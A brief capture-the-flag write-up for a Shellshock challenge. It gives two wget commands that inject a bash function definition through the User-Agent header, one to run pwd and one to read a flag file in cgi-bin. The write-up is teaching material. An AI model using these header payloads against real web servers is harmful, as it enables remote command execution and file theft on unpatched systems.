Hungry Hungry Hackers Shellshock

As the name suggests this is probably a shellshock vulnerability. You can test for it below


wget -U "() { test;};echo \"Content-type: text/html\"; echo; echo; pwd;"  

Basically the webserver is vulnerable to executing bash commands on the server. This means that we can do normal bash commands. No privilege escalation is needed for this challenge.

Basically we want to keep changing our working directory until we find some file named flag.
When we do all we do is execute the below script


wget -U "() { test;};echo \"Content-type: text/html\"; echo; echo; cd cgi-bin; /bin/cat flag ;"  
Press ` to check out my sick terminal!